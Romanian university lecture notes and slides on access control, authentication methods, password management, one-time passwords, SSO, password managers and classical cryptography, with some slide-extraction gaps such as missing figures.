tehnologiile SSO, dar sincronizarea parolei are și dezavantaje importante de securitate. Deoarece
sincronizarea parolei creează aceeași parolă pentru a fi utilizate la mai multe resurse, fiecare dintre
care stochează parola sau hash-ul parolei, compromiterea parolei la orice instanță le compromite
pe toate. Acest lucru este deosebit de periculos dacă sincronizarea parolei este utilizată pentru
resurse cu siguranță înaltă .
O altă abordare a managementului parolelor este un soft de gestionare şi administrare a parolelor.
Managerul de parole este o aplicație software care gestionează și organizează parolele
utilizatorului. Softul stochează parole criptate într-o bază de date sau fișier, cerînd utilizatorului să
creeze o parolă unică de acces la toată baza de date.
Managerele de parole pot fi folosite ca protecție împotriva phishing-ului și pharming-ului.
Spre deosebire de om, softul poate încorpora un script de logare automată, care compară URL-ul
site-ului actual cu cel a site-ului stocat, dacă cele două nu se potrivesc, atunci managerul de parole
nu completează automat câmpurile de conectare, astfel utilizatorul fiind protejat împotriva
imitațiilor vizuale și site-urilor clone. Acest avantaj încorporat, este necesar și utilizatoriilor care
memorează cu ușurință parolele.
Majoritatea managelor de parole sunt dotate cu generatoare de parole, oferind utilizatorului
posibilitatea creării unor parole indestructibile.
Conform NIST, SP 800-118 Guide to Enterprise Password Management, aplicaţile de
management local al parolelor îi sunt recomandate următoarele caracteristici:
- Funcționare: utilizatorul selectează un cont din listă, parola se afișează, utilizatorul o
copiază şi o pune în cîmpul parolă.
- Aplicaţia trebuie să se închidă automat după o anumită perioadă de inactivitate.
- Să șteargă automat bufferul de memorie folosit la copierea parolei.
- Să existe posibilitatea de backup a bazei de date şi a informaţiei.
- Să utilizeze o parola Master puternică, greu de ghicit sau spart.
- Să utilizeze algoritmi (şi implementările acestora) aprobaţi de Federal Information
Processing Standard (FIPS).
- Utilizatorul trebuie să faca update manual la baza de date dupa fiecare modificare a unei parole.
- Aplicaţia trebuie să permită setarea setului de caractere (cifre, litere mici, mari,
simboluri) şi a lungimii pentru fiecare parolă în parte, la alegerea utilizatorului, pentru
adaptarea uşoară la diferite sisteme.
- Să poată administra separat parolele cu impact major (importante) de cele normale.
- Să nu permită salvarea de parole şi informaţii sensibile în mod nesecurizat.
- Crearea şi înlocuirea parolelor să se facă uşor pentru facilitarea schimbării periodice.
- La evenimente imprevizibile (crash, etc...) nu trebuie să rămînă parole şi informaţii
nesecurizate, pe HDD, SD, Flash sau altă memorie nevolatilă.
Majoritatea managerilor de parolă actualii îndeplinesc aceste caracteristici utilizînd şi
caracteristiicii suplimentare cum ar fi logare automată, fără utilizarea tastaturei, aceasta fiind realizată
cu ajutorul pluginurilor încorporate în browser-e. Exemplu de manageri de parole: KeePass, eWallet,
LastPass, 1Password, RoboForm, Kaspersky Password Manager etc. (figura 4).

Figura 4. Managerul de parole Kaspersky


Tema nr.2 Controlul accesului în
sistemele informaționale

1. Tipuri de control al accesului


2. Autentificare, autorizare, auditare (AAA)
3. Managementul parolelor

Lector univ. R.Bulai


1. Tipuri de control al accesului
• Controalele sunt impuse pentru a diminua
riscurile la care sunt expuse sisteme
informaționale și pentru reducerea
potențialelor pierderi.

• Controalele pot fi:


1. Tipuri de control al accesului

• 1. Controale preventive – au ca scop


preîntîmpinarea apariției unor incidente în
sistem;
• 2. Controale detective – vizează descoperirea
unor apariții ciudate în sistem;
• 3. Controale corective – folosite pentru
readucerea la normalitate a sistemului după
anumite incidente la care a fost expus.
1. Tipuri de control al accesului
• 1. Controale administrative – exercitate prin politici și
proceduri, instruire, verificări (generale, la locul de
muncă, în concediu) și o supraveghere exigentă;
• 2. Controale logice sau tehnice – cuprind restricții de
accesare a sistemului și măsurile prin care se asigură
protecția informațiilor (sist de criptare, cardurile
inteligente[crptare/decriptare, semnarea mesajelor,
introducerea sist. de plăți electronice], protocoale de
transmisie sau liste de control al accesului);
• 3. Controale fizice – gărzile de protecție și pază,
securitatea clădirilor (camere cu servere), protecția
cablurilor, separarea atribuțiilor de serviciu.
1. Modele de control al accesului
• 1. Controlul obligatoriu al accesului – autorizarea accesului unui
subiect (entitate activă: persoană sau proces) la un obiect (entitate
pasivă: fișier) depinde de eticheta care specifică nivelul de
autorizare a subiectului, precum și de clasificare a obiectului [ex.
dom.mil. documentele și utilizatorii lor sunt grupați în confidențial,
secret și strict secret]. Controlul bazat pe reguli de acces
• 2. Controlul discreționar al accesului – subiectul are autoritatea , în
cadrul unor limite bine definite să specifice obiectele care pot fi
accesibile, de ex. conform unei liste de control al accesului
subiecților la obiectele sistemului;
• 3. Controlul nediscreționat al accesului – o autoritatea centrală
stabilește subiecții care pot să aibă acces la anumite obiecte, în
funcție de politice de sec a organizației [de ex. controlul bazat pe
roluri (rolul individual într-o orgaiz.) sau pe sarcini
(responsabilitățile și sarcinile subiectului)].
Forme combinoate de cntrol

• Preventiv/administrativ
• Preventiv/tehnic (IntrusionPreventionSistem,
protocoale, criptare, metode de acces etc.)
• Preventiv/fizic
• Detectiv/administrativ
• Detectiv/tehnic (IntrusionDetectionSistem)
• Detectiv/fizic (analiza a ceea ce oferă senzorii
sau camerele)
2. Autentificare, autorizare, auditare (AAA)

• Controalele vizează responsabilizarea


persoanelor care accesează informații
sensibile.

• Responsabilizarea este înfăptuită prin


mecanisme de control al accesului care
exercită funcțiile de identificare, autentificare,
autorizare și auditare.
Autentificare, Autorizare, Auditare (AAA)

Autentificare:

• Originea cuvantului in limba greaca cu sensul de real, veritabil


• Procesul de stabilire ca un obiect sau un subiect sunt
adevarate, asa cum cineva pretinde, procesul de verificare a
identitatii digitale

Exemplu: stabilirea identitatii unei persoane la ghiseul bancii cu


un act de identitate.

Obs: autentificare si autorizare notiuni diferite

8
Autentificare, Autorizare, Auditare (AAA)

Autorizare:

• Procesul prin care unei entitati particulare i se acorda dreptul


sa presteze o activitate, pe baza unor reguli, ca urmare a unei
proprietati mostenite din procesul de autentificare
• Poate fi determinate de o gama de restrictii ca de ex: restrictii
de timp, restrictii de locatie fizica, restrictii de acces multiplu
la resursa.
• Exemplu: garantare accesului pentru citirea unui fisier specific
de catre utilizatorul autentificat
• Tipuri de servicii: IP address filtering, address assignment,
route assignment, Quality of Services, latime de banda etc.

9
Autentificare, Autorizare, Auditare (AAA) (3)

Auditare (Auditing sau Accounting):


• Urmarirea evenimentelor, de ex esecuri de autentificare si
autorizare, resurse consumate de catre utilizatori.
• In afara aspectelor de securitate aceste informatii pot fi utilizate
pentru management, planificare, facturare etc.
• Metode:
– Real-time accounting, informatii interpretate in timp real
– Batch accounting: informatiile sunt salvate si interpretate
ulterior.
• Informatiile tipice stranse contin identitatea utilizatorului, natura
serviciului furnizat, momentul la care serviciul a inceput si cand
s-a terminat

10
Metode de autentificare

Metode bazate pe un singur factor:


• Autentificare bazata pe ceea ce stii (autentificarea cu username si parola)
Ceva ce persoana știe Controlul accesului prin parole – o parolă de ex.

Avantaje:
• Nu necesita resurse importante de procesare
• Este o metoda de autentificare simpla
• Se pot transmite si alte informatii impreuna cu parola
Dezavantaje:
• Parola poate fi usor ghicita in multe cazuri
• De multe ori sunt stocate in clar pe un server (cine are acces la baza de date a serverului
poate pretinde ca este alt utilizator).
• Chiar daca sunt stocate criptat pe server se pot transmite prin retele nesigure.
• Fiecare sistem detine o copie a informației de autentificare. Actualizarea parolele pe
fiecare sistem duce la alegerea de parole simple (risc).
• Autentificarea nu este refolosibila, se autentifica pe fiecare sistem sau aplicatie.
Exceptii: OpenID, OAuth
• Un sistem care impersoneaza sistemul real (prin IP spoofing), permite serverului
impostor sa colecteze informatia personala ce va fi folosita pentru autentificare pe
serverul real.

11
Metode de autentificare

Metode bazate pe un singur factor:

• Autentificare bazata pe ceea ce ai (PKI, ai o cheie privata)


Ceva aflat în posesia persoanei Controlul accesului prin obiecte –
cartele magnetice, cartele speciale [carduri auexpirante],
echipamente de identificare personală sau jetoane;

• Autentificare bazata pe ceea ce esti (sisteme biometrice)


Ceva care individualizează persoana Controlul accesului prin
biometrie – identificările biometrice (amprente digitale, semnătură,
voce, forma mîinii, imaginea retinei, imaginea feței etc.);[SUA dup
11.09 Congresul American a adoptat ca orice cetățean străin trebuie
să posede un document purtător de datele biometrice –
recunoașterea feței și a amprentelor digitale, ulterior și
recunoașterea irisului ]

12
Metode de autentificare

Metode bazate pe un singur factor:


• Autentificare bazata pe locul unde esti (autentificarea cu semnatura
locatiei)
Locul geografic Controlul geografic al accesului – unde este înregistrat
calculatorul
[Kaspersky punea problema legitimării persoanelor utilizatoare de
servicii informatice și comunicații în spațiul global, tocmai pentru a se
asigura responsabilizarea și conștientizarea participanților la noul trafic –
el făcea asemănare cu sistemul de conducere a automobilelor…].
[Corporația intern.Series Research din Colorado a realizat tehnologia
autentificării locației Cyber Locator. Sistemul folosește semnale bazate
pe microunde transmise de 24 sateliți GPS pentru calcularea și validarea
unei semnături a locației. Fiecare utilizator al unui sistem protejat are un
senzor al semnărurii locației SSL]
13
Metode de autentificare

• Metodele de control al accesului trebuie să se bazeze pe cel


puțin două dintre cele 4 căi enumerate (cartelă-parolă, jeton-
parolă tec.) sau să mai folosească și al treilea element – cel
biometric.

Metoda bazate pe mai multi factori:


• autentificare cu doi factori combinatii ceea ce ai/ceea ce sti (token,
smartcard) sau ceea ce esti/ceea ce stii.
• autentificare utilizand mai multi factori din categorii diferite

14
Exemple autentificare multi factor

• Smartcard pastreaza o cheie criptografica pe card ce este deblocata de utilizator cu


keypair special. Utilizatorul introduce passphrase pentru a debloca cheia si
sistemul face un schimb de chei criptografice cu serverul central pentru verificare

• Autentificare impartita intre doua persoane, ambele se autentifica

• Autentificare centralizata: utilizarea unui model centralizat ca autoritate centrala


care autentifica utilizatorii remote la un mare numar de sisteme. Utilizeaza
protocoale de autentificare remote ca RADIUS (Remote Access Dial-In User
Service), TACACS (Terminal Access Controller Access-Control System), Kerberos,
DIAMETER

• Tehnologia OTP

15
Zero-knowledge proofs

• Ofera posibilitatea ca o masina A sa convinga o alta masina B sa-I permita


accesul fara a dezvalui o informatie secreta.
• Masinile ce folosesc o astfel de tehnica schimba mai multe informatii
pentru a finaliza autentificarea.
• Clientul creaza o problema aleatoare si dificila de rezolvat pe care o
rezolva cu informatiile pe care le detine.
• Clientul valideaza solutia utilizand o schema de validare si trimite solutia si
problema serverului.
• Serverul cere clientului ca problema sa demonstreze ca aceasta este
solutia.
• Clientul reactioneaza in conformitate cu cererea.
• De regula se ajunge la schimbarea a zeci de mesaje cu succes inainte ca
autentificarea sa fie completa.

16
Rohos Logon Key
• Soluția de autentificare prin 2 factori
convertește orice unitate USB în token de
securitate pentru computerul Dvs. și permite
accesul la Windows într-un mod sigur cu USB
token, înlocuind Windows login
Rohos Logon Key
• Înlocuiește parola de autentificare de bază cu o cheie USB
hardware (unitate flash USB sau card de memorie)
• Utilizează parola mare, care nu este necesar de memorizat
• Procesul de autentificare cu cheia USB este complet automat și
rapid!
• Sistemul este protejat cu parolă însă nu este necesar să introduceți
parola manual de fiecare dată cînd vă conectați sau deblocați
Windows
• Autentificare asigurată prin 2-factori: Cheia USB + parola PIN
• Folosiți o singură cheie USB pentru a va conecta la computerul de
acasa, laptop și de oficiu
• Acces limitat la computer bazat pe cheia USB
• Windows este protejat chiar și în Modul de Siguranță
• Stabilirea unei parole la contul Dvs. de utilizator ofera o protecție
mai buna pentru computerul în hibernare.
Rohos Logon Key

• Logon de urgență vă va ajuta să accesați sistemul în caz că


ați pierdut unitatea USB sau ați uitat codul PIN
• Codul PIN protejază cheia USB împotriva utilizării
neautorizate pentru login (cu un numar limitat de încercări de
accesare)

• Cu Modul de Siguranță – nimeni nu va putea evita cheia de


securitate USB și deschide Windows în Safe Mode

• Rohos folosește principiile de securitate a datelor aprobate de


NIST: parola nu este păstrata pe cheia USB în formă
deschisă. Protecția la copiere a cheiei USB nu permite
crearea neautorizată a duplicatelor. Toată informația de pe
cheie este criptată cu AES-256 bit lungime cheie.
3. Managementul parolelor
(reguli de control al parolelor)

• Parolele trebuie schimbate cam la 6 luni, dar pentru datele


deosebit de importante - termene și mai scurte;
• Parolele comune trebuie schimbate imediat ce o persoană
părăsește grupul sau nu mai are dreptul utilizării;
• Parolele trebuie schimbate imediat ce se constată unnele
bănuieli privind cunoașterea lor de alte persoane sau cînd
trebuie dezvățuită pentru redresarea unei strări anormale
temporale;
• Parolele trebuie ținute minte și nu scrise pe oriunde (cu
excepția necesității intervenției de urgență / plic sigilat);
• Listele cu parole vor fi memorate în formă criptată;
• La introducere nu trebuie să se afle persoane străine prin
preajmă;
3. Managementul parolelor
(reguli de control al parolelor)

• Cel puțin 14 caractere și nu 8 sunt destul de vulnerabile…


• Blocarea operațiunilor de încercare repetată;
• Dacă un terminal funcționează o perioadă lungă de timp /
procesul de autentificare trebuie să aibă loc la intervale
regulate de timp pentru a se asigura că nu folosește
altcineva sistemul;

• Odată ce a pătruns în sistem, utilizatorul nu trebuie să i se


permită să-și schimbe identitatea / să nu pătrundă în
părțile altor utilizatori;
• La deschiderea unei noi sesiuni de lucru, userului trebuie să
i se aducă la cunoștință ultimul timp de accesare a sist cu
parola respectivă
Tehnologii de autentificare

• One-time password

• Single Sign On (SSO)

• Password Manager
One-time password

• Dezvoltata pentru a elimina problemele date de reutilizarea parolei

• Ideea a fost propusă de Лесли Лампортом în anii 80

• Parola utilizata o singura data ( one time password, OTP) — este valida
doar pentru o singura sesiune de autentificare sau poate fi limitata de un
interval de timp

• Avantajul: parola nu poate fi reutilizabila

• Dezavantaj: se cere utilizarea tehnologiilor suplimentare (nu totdeauna


poate preintimpina amenintarile Man-in-the-Middle)

23
One-time password
• Tipuri: parola provocare raspuns (challenge-response) si lista de parole

• Provocare raspuns raspunde cu o valoare de provocare dupa ce a primit id


utilizator. Raspunsul este calculat fie din valoarea de răspuns cu dispozitive
electronice sau selectat dintr-un tabel, pe baza provocarii.
[Utilizarea algoritmilor matematici de creare a unei noi parole OTP pe baza
unei cereri (de ex.un numar aleator, ales de server sau o parte dintr-un
mesaj) si/sau contor]

• Lista de parole. Liste de parole utilizate secvential de persoana care


doreste sa acceseze un sistem. Greu de calculat valorea urmatoare.
[Utilizarea algoritmilor matematici de creare a unei noi parole OTP pe baza
parolei precedente (parolele practic creaza un lant si trebuie sa fie utilizate
intr-o anumita ordine]

• Autentificare bazata pe un token hardware care genereaza o parola


conform unui algoritm care se bazeaza pe timp, verificata de serverul de
autentificare
[Sincronizarea in timp dintre server si client (parola este valida intr-un
timp scurt)]

24
Exemple de OTP

• RSA SecurID utilizatorul poarta un token care este sincronizat in timp cu serverul
central RSA. El genereaza numere de 6 digiti care se schimba la 60 secunde. La
login se combina numarul de 6 digiti afisat de token cu PIN-ul personal pentru a
crea one-time password. (http://www.youtube.com/watch?v=k_zpbJF9pmc)

• Tokenul ActivCard cere utilizatorului sa introduca PIN-ul si cu algoritmul special


genereaza on-time password.

• Sistemul Secure Computing's SafeWord utilizeaza counter-based token care


genereaza un simplu cod de sase digiti.

• Token software pastrate in sisteme separate ca PDA sau telefon ce genereaza


parola.

• Sisteme challenge-based. Serverul central furnizeaza challenge (provocare) pe


care utilizatorul il introduce in token si acesta genereaza parola

25
RSA SecurID
(server central de autentificare, agenţi software şi
token-uri)
• Agentul este o aplicaţie software instalată pe o maşină ca: domain server, web server sau calculator
personal, care facilitează comunicarea cu serverul central de autentificare. El cere fiecărui user care vrea
să se logheze să introducă passcode-ul corect plus informaţiile de logare (user id şi network password)

• Token-ul este un dispozitiv hardware sau software care generează şi afişează un număr aleator (de 6
cifre) pentru a permite utilizatorilor să acceseze securizat resurse protejate din reţea. Numărul random se
numeşte tokencode.

• În plus faţă de tokencode unele soluţii mai necesită un PIN, care poate fi creat de user sau generat de un
server central de autentificare. Când utilizatorii doresc să acceseze acea resursa, pentru login, trebuie să
introducă acest passcode (tokencode plus PIN).

• Fiecare token conţine un ceas şi un număr unic (seed number). La fiecare minut, un algoritm combină
timpul curent şi acest număr rezultând afişajul de pe token, acele 6 cifre aleatoare.

În prealabil serverul de autentificare a fost configurat astfel:


• Seed number-urile au fost importate în sistem (seed number-urile sunt în nişte fişiere)
• Seed-urile din aceste fişiere sunt asigante token-urilor pentru a genera tokencode-ul când o cerere de
autentificare este primită de la un agent.
• Se asignează token-uri utilizatorilor (înainte că un utilizator să se autentifice cu un token, acesta trebuie
să fie recunoscut de server)
• Pentru a proteja împotriva furtului de passcode serverul verifică dacă acelaşi passcode a mai fost folosit
într-o altă tentativă de autentificare.
RSA SecurID
(server central de autentificare, agenţi software şi
token-uri)
În timpul procesului de autentificare serverul şi agentul lucrează în următorul
mod:
1. Utilizatorul iniţiază o cerere de autentificare logându-se în sistem
2. Agentul cere utilizatorului să introducă un user id şi un passcode sau
tokencode
3. Utilizatorul citeşte şi introduce tokencode-ul de pe token şi împreună cu
PIN-ul creează passcode
4. Agentul software trimite datele introduse la server (pachetele trimise sunt
criptate cu o shared key numită node secret care este stiută doar de
server si de agent. Node secret este el însuşi criptat pe agent şi în bază
de date)
5. Serverul primeşte datele şi caută un user record în bază de date
6. Serverul calculează valoarea corectă a passcode-ului accesând token
record-ul asociat userului. Acest passcode este comparat cu cel primit de
la utilizator
7. Serverul evaluează politicile date de administrator
8. Dacă passcode-ul este corect şi politicile permit accesul atunci userul are
acces la aparatul protejat
One-time password. Standardizarea

• Sunt patentate foarte multe tehnologii OTP, ceea ce face ca standardizarea


în acest domeniu sa fie greu de facut. Cu toate acestea există câteva
standarde, precum RFC 2289[3] și RFC 4226 (HOTP).

• McAfee® One Time Password Server

28
Soluţia Single Sign On (SSO)
• Odată cu proliferarea serviciilor on-line a apărut şi nevoia
firească de autentificare a consumatorilor acestor servicii.
• Astfel, s-a ajuns ca un individ să fie nevoit a memora mai
multe zeci de parole, lucru care tinde să devină ineficient
şi nesigur.
• Utilizatorii în general preferă să nu ia în calcul riscurile la care
se expun şi pentru a evita notarea parolelor pe diverse
suporturi aleg calea cea mai la îndemână, parola unică pentru
toate serviciile.
• O soluţie la acest tip de probleme este adoptarea
sistemelor cu autentificare singulară, numite Single
Sign-On.
• Un sistem SSO permite ca un utilizator să fie autentificat
automat fiecărui serviciu pe care îl accesează, cu
condiţia autentificării iniţiale cu succes a clientului la sistemul
SSO.
Soluţia Single Sign On (SSO)
• OpenID — este un sistem decentralizat care permite
utilizatorilor să utilizaze un singur cont pentru a se
autentifica pe mai multe site-uri, portaluri, bloguei sau
forumuri care nu au vreo legatură comună.

• Windows Live ID (la început Microsoft Wallet, Microsoft


Passport, .NET Passport,Microsoft Passport Network) —
serviciu de identificare și autentificare de la Window Live.
Se utilizează pentru o autentificare unică la toate serviciile
de rețea de la Microsoft.
Password Manager
• Password Manager memorează numele de utilizator şi
parolele asociate, astfel încât poţi dispune în acelaşi timp de
mai multe parole diferite şi puternice, fără a fi necesară
memorarea fiecăreia dintre ele

• Organizare şi stocare a tuturor parolelor într-o locaţie sigură


• Înregistrare pe site-uri şi aplicaţii printr-un singur click
• Acces şi securizare a tuturor parolelor prin intermediul unei
parole unice
• Stocare a parolelor într-o bază de date criptată de pe PC
• Creare automată a unor parole puternice, unice
• Posibilitate de a stoca o versiune portabilă pe o unitate flash
• Completare automată a formularelor de înregistrare online
Password Manager
Managerii de parole pot fi clasificați în 3 categorii:
• Desktop — salvează parolele în managerul de parole instalat pe
computer

• Mobile — păstrează parolele în managerul de parole instalat pe


dispozitivul mobil sau pe suporturi mobile de memorie

• De tețea — manageri de parole online, parolele fiind salvate pe site-


urile provider-ilor

Cei mai populari manageri de parole:


• KeePass, eWallet, LastPass, 1Password, RoboForm
(http://habrahabr.ru/post/125248/)
KeePass
KeePass este un soft de management a
parolelor disponibil gratuit, pentru
Microsoft Windows și versiuni neoficiale
pentru Linux , MacOS , iOS, Android și
Windows Phone. KeePass depozitează
userame-urile, parolele și alte cîmpuri
într-o bază de date criptată, protejată de
o parolă și/sau file-cheie. Implicit baza de
date este stocată local dar nu în cloud.
Softul este dotat cu un generator de
parole. Pentru criptare se utilizează
algoritmii Advanced Encryption
Standard (AES 256bit)
eWallet
eWallet este un produs al companiei
Ilium Software. Softul permite
stocarea informației confidențiale
cum ar fi parole, username-uri, chei
pentru produse soft ș.a. O trăsatură
caracteristică a acestui soft este
prezența șabloanelor pentru carduri
credit ș.a. Deasemenea conținutul
bazei de date poate fi sincronizat de
pe diferite device-uri. Softul este
dotat cu un generator de parole.
Pentru criptarea informației se
ultilizeză algoritmul AES 256bit
1Password
1Password este este un manager de parole dezvoltat de AgileBits. Acest soft crează o
bază de date protejată de o parolă-master, care servește ca parolă de acces la baza de
date și ca cheie de criptare a informației, care se realizează prin algoritmul AES
128bit. 1Password poate crea o versiune mobilă a bazei de date în formă de html, un
fișier care poate fi vizualizat în orice browser datorită funcției 1Password Anywhere.
Pentru sporirea securității 1Password curăță automat buffer-ul de schimb dacă în
acesta a fost copiată o parolă, implicit acestă este timp de 90 de sec
RoboForm
Este un produs ce oferă stocarea informației confidențiale și
completarea automată a formelor de autentificare pe web site-
uri. Pot fi create mai multe “persoane”-seturi de date ce urmeză
a fi introduce pentru logare. Softul poate fi integrat cu Firefox,
Netscape, SeaMonkey, Flock, Internet Explorer, Google Chrome,
Maxthon ș.a. Pentru criptarea datelor se folosesc algoritmii
AES, Blowfish, RC6, 3-DES, DES. La fel programul este dotat cu un
generator de parole . Softul oferă posibilitatea de logare fără a
folosi tastatura ceea ce prezinta un avantaj pentru securizarea
datelor contra scurgerii lor prin intermediul keylogger-uri. Un
dezavantaj al acestui program este codul închis ceea ce împiedică
evaluarea obiectivă a algoritmilor de criptare a informației.
LastPass
LastPass este un produs disponibil
în varianta free și premium a
companiei LastPass. Aceasta este
realizată în formă de plugin-uri
pentru Internet Explorer, Google
Chrome, Mozilla Firefox, Opera,
Maxthon și Apple Safari. Baza de
date a informației este protejată de
o parolă-master și este plasată
local, avînd loc o sincronizare cu
toate browserele . LastPass este
dotat cu un generator de parole și
poate crea un jurnal de evidență a
autentificărilor pe unele site-uri
Tema: Criptogtafia.
Tehnologii criptografice
• Concepte de bază privind criptografia.
Scurt istoric al criptografiei

• Tehnologii criptografice
Criptografia
• Criptografia este arta şi ştiinţa ascunderii
semnificaţiei unei comunicări împotriva unor
interceptări neautorizate.

• Scopul criptografiei este de a proteja


informaţiile transmise fără să poată fi citite şi
înţelese decât de persoanele cărora le sunt
adresate.

• Cuvântul are origine grecească, însemnînd


scriere ascunsă – kryptos graphein
Criptografia
• Cheia este o informaţie sau o secvenţă prin care
se controlează cifrarea şi decifrarea mesajului.

• Criptarea end-to-end reprezintă informaţiile


criptate care sunt transmise din punctul de
origine la destinaţia finală.

• Criptarea înlănţuită - fiecare entitatea are chei


comune cu cele două noduri vecine din lanţul de
transmisie. Astfel, un nod primeşte mesajul
criptat, de la predecesor, îl decriptează, după
care îl recriptează cu o altă cheie, care este
comună cu nodul succesor.
Istorie: cifrul “Schital”

Este cunoscut, între secolele X si VII î.Hr.,


conducătorii Spartei, unul din cele mai militarizate
oraşe-state greceşti, aveau o legătură militară
perfectă şi cifrau mesajele cu ajutorul schitalului,
unul din cele mai vechi dispozitive criptografice
cunoscute, care efectua metoda transpunerii, adică
schimbarea poziţiei literelor din mesaj. Ei foloseau
schitalului (bagheta lui Plutarque), în jurul căreia
rulau în spirale alipite o bandă de piele, papirus sau
pergament pe care scriau mesajul. O data
desfacut, mesajul era trimis destinatarului care
trebuia să posede o baghetă identică, necesară
descifrării.
Tehnologii criptografice
• Substituţia (patratul Polibian, cifrul lui Cezar)

• Transpoziţia (tabele de cifrare,permutarea


dublă)

• Codurile

• Ascunderea informaţiilor(stenografia,
filigranarea)
Substituţia: Patratul Polibian
• Esenţa metodei consta în înlocuirea
simbolurilor textului cifrat după o regulă
bine determinată iniţial cu simbolurile
aceluiaşi alfabet sau unui alfabet străin.
• Scriitorul şi istoricul Polibiu a inventat în
scopul cifrării un tabel patrat cu mărimea
5X5, completat haotic(la întîmplare) cu
literele alfabetului grecesc.
Substituţia: Patratul Polibian
• Făcînd a analogie cu alfabetul nostru
actual, tabelul completat 5x5 va arăta:
Dacă vom încerca
să cifrăm cuvintul:
CRIPTOGRAFIE
vom obţine:
DSJQPKHSBGJA
Substituţia: Cifrul lui Caesar
• Această denumire cifrul a moştenit-o de la
numele împăratului roman Caius Iulius Caesar,
care utiliza acest cifru în mesajele sale cu
Ciceron (anii 50 pînă la era nouă).
• Litera cu care se înlocuia litera iniţială, se
determina prin substituţia în alfabet de la litera
iniţială peste N litere. În cazul ajungerii la
sfîrşitul alfabetului, se efectua trecerea ciclică la
începutul lui.
• Caesar utiliza cifrul substituţiei N=5, aşa cifru
poate fi definit prin tabelul compus din perechile
de litere a textului iniţial şi respectiv cel cifrat.
Substituţia: Cifrul lui Caesar

De exemplul, mesajul lui Caesar: VENI VIDI VICI


putea să arate în felul următor: AJSN ANIN ANHN
Permutarea: Tabele de cifrare
• Transpoziţia se bazează pe următoarea ideie:
înloc să înlocuieşti un caracter cu altul, e mult
mai simplu să înlocuieşti ordinea caracterelor.
• Unul din cele mai simple exemple sunt tabelele
de cifrare, cheea cărea este mărimea(lungimea
şi lăţimea) tabelei.
• Ca exemplul, vom cifra mesajul iniţial:
PERSOANA DE ÎNCREDERE VA VENI LUNI LA AMEAZĂ PRIETENUL TĂU

• Se înscrie în tabela cu dimensiunile 7x7 pe


coloane literă după literă.
Permutarea: Tabele de cifrare

• Rezultatul cifrării este


PAEVIZE EDDELĂN REENAPU SÎRIARL ONELMIT ACVUEEĂ NRANATU
Permutarea: Tabele de cifrare
• O duritate mai mare la descifrare o are
algoritmul criptografic numit permutarea
după cheie unică.
• Această metodă se deosebeşte de cel
precedent prin aceea că tabelele se
modifică după un cuvînt cheie, frază sau o
consecutivitate de cifre de lungimea liniei
tabelei.
• De ex., utilizăm cuvîntului-cheie de cifrare:
ÎMPĂRAT , cifrul 7253416, iar textul
mesajului va fi cel din exemplul trecut
Permutarea: Tabele de cifrare

ZAVI EEPĂ DELD NEPE NAEU RRÎI ARLS INLM ETOE CUEV ĂATR NAAU NNNN
Permutarea: Permutare dublă
• În cazul permutării duble a coloanelor şi
liniilor tabelele permutărilor se definesc
aparte pentru coloane şi aparte pentru linii.
La început în tabel se înscrie textul
mesajului, apoi pe rînd se fac permutările
coloanelor, după care – a liniilor.
• Avînd textul iniţial VENIŢI MARŢI SEARA
• După prima permutare: EINV IAMŢ ŢSIR AARE
• După a doua permutare: IAEŢ AAIS MRNI ŢEVR
Permutarea: Permutare dublă
• Cheiea pentru cifrul dublei permutări serveşte
consecutivitatea de cifre a coloanelor şi
consecutivitatea de cifre a liniilor din tabelul
iniţial(în exemplul nostru: parola coloanelor –
4132 şi parola liniilor 3142, plus la asta a doua
citire a fost pe coloane, nu pe linii).
Codurile
• Codurile reprezintă o transformare care
operează la nivelul cuvintelor sau frazelor.
• Codurile sunt utilizate pentru a putea transmite
unele construcţii predefinite din domenii diferite,
de regulă afaceri. De ex., codul 500 ar putea să
însemne “De efectuat recepţia cantitativă şi
calitativă a mărfurilor expediate”.
• Serviciile telegrafice folosesc pentru diminuarea
mesajului. Există două tipuri de cărţi: codul –
semnificaţia în clar sau semnificaţia în clar -
codul
Ascunderea informaţiilor:
steganografia
• Cuvântul steganografie provine din grecescul steganos
(secret) şi graphein (reprezentare grafică - scriere)
• Un mesaj text, imagine sau sunet poate fi încorporat într-
un alt mesaj text, imagine sau sunet cu ajutorul unui
algoritm implementat în aşa fel încât procesul de
ascundere să nu fie bănuit sau detectat nici de ochiul
uman, dar nici de un program specializat în acest sens

• Herodot a propus o tehnică în timpul războiului dintre


greci şi persani () un sol era ras pe cap, pe cap era
tatuat mesajul secret, după ce creştea părul – era trimis
la receptor.
• Penitenciare – preluarea primei litere a fiecărui cuvînd
dintr-un text, ascunderea mesajelor printre biţii imaginilor
digitale
Ascunderea informaţiilor
stenografia
Ascunderea informaţiilor:
filigranarea
• Filigranarea – pentru stabilirea încălcărilor
drepturilor de autor - marca digitală a
copyrightului:
• www.digimarc.com, www.digimarc-id.com – protejarea imaginilor;
• www.aris-techno.fr – contra pirateriei din muzică

• securitatea tipăririi hîrtiilor de valoare, a


bancnotelor prin gravura cu acizi, literă
presată, cerneluri schimbătoare optic,
firele sau foliile metalice etc.
Solutii de protectie continut video
Pentru a bloca atacurile cibernetice e nevoie de:
• blocarea accesului conținutului dăunător aflat pe unele
pagini web accesate frecvent de staff-ul creativ;
• monitorizarea continuă a echipamentelor IT folosite, cu
un sistem capabil să detecteze, să izoleze și să repare
breșe imediate

Cisco oferă o astfel de soluție:


• ASA Firewall cu Virtual Private Network;
• Firepower Next-Generation Intrusion Prevention
(NGIPS);
• Advanced Malware Protection (AMP)
• software-ul de analiză de rețea Stealthwatch.
Solutii de protectie continut video
Serviciul asigură protecție pe tot parcursul fluxului de
producție video.
Înainte de lansarea producției, perimetrul rețelei este
securizat.
In timpul producției video oferă detecție instantă a unui
posibil atac.
După terminarea producției scanează eventuale
programe malware care ar putea afecta conținutul.

Distribuția pe marile ecane poate fi realizată în siguranță,


datorită serviciului VideoGuard Everywhere, care
împiedică multiplicarea ilegală a conținutului video.
În caz de streaming online, serviciul VideoGuard
Everywhere Streaming Piracy Prevention localizează,
identifică, verifică și elimină sursa.
Tema: Sisteme de criptare
• Sisteme simetrice de criptare (DES,
AES).

• Sisteme asimetrice de criptare (Diffie-


Hellman, RSA)
Tipuri de algoritmi de criptare
Tipuri de algoritmi de criptare
• Algoritmi Asimetrici
Algoritmi care folosesc diferite chei pentru criptare și
decriptare

• Algoritmi Simetrici
Algoritmi care folosesc acceași cheie pentru criptare și
decriptare
– Pe Bloc
Împart fişierul în blocuri egale de biți și cripteaza fiecare bloc
independent de celelalte
– Pe flux
Fiecare caracter al textului deschis se substituie cu alt caracter
– Sincroni
caracterul criptat Ci+1 NU depinde de Ci
